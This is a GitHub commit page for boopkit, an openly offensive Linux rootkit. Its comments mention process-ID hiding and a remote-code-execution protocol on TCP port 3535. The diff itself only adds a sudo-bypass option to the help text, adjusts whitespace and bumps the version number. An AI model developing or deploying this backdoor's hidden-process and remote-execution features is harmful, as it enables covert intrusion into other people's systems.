Skip to content

Commit

Permalink
Automatic commit from github.com/kris-nova/bin/git-save
Browse files Browse the repository at this point in the history
Signed-off-by: Kris Nóva <kris@nivenly.com>
  • Loading branch information
krisnova committed Apr 10, 2022
1 parent edb78ae commit d32da22
Show file tree
Hide file tree
Showing 3 changed files with 4 additions and 3 deletions.
Binary file modified boop/boopkit-boop
Binary file not shown.
5 changes: 3 additions & 2 deletions boopkit.c
Original file line number Diff line number Diff line change
Expand Up @@ -61,7 +61,8 @@ void usage() {
printf("\n");
printf("Options:\n");
printf("-h, help Display help and usage for boopkit.\n");
printf("-x, ignore Source addresses to reject triggers from.\n");
printf("-s, sudo-bypass Bypass sudo check. Breaks PID obfuscation.\n");
printf("-x, reject Source addresses to reject triggers from.\n");
printf("\n");
exit(0);
}
Expand Down Expand Up @@ -169,7 +170,7 @@ static int handlepidlookup(void *ctx, void *data, size_t data_sz) {

void rootcheck(int argc, char **argv) {
long luid = (long)getuid();
printf(" -> getuid() : %ld\n", luid);
printf(" -> getuid() : %ld\n", luid);
if (luid != 0) {
printf(" XX Invalid UID.\n");
if (!cfg.sudobypass) {
Expand Down
2 changes: 1 addition & 1 deletion boopkit.h
Original file line number Diff line number Diff line change
Expand Up @@ -39,7 +39,7 @@ struct tcp_return {
};

// VERSION is the semantic version of the program
#define VERSION "1.0.5"
#define VERSION "1.0.6"

// PORT for the boopkit TCP protocol for boopscript RCE
#define PORT 3535
Expand Down

0 comments on commit d32da22

Please sign in to comment.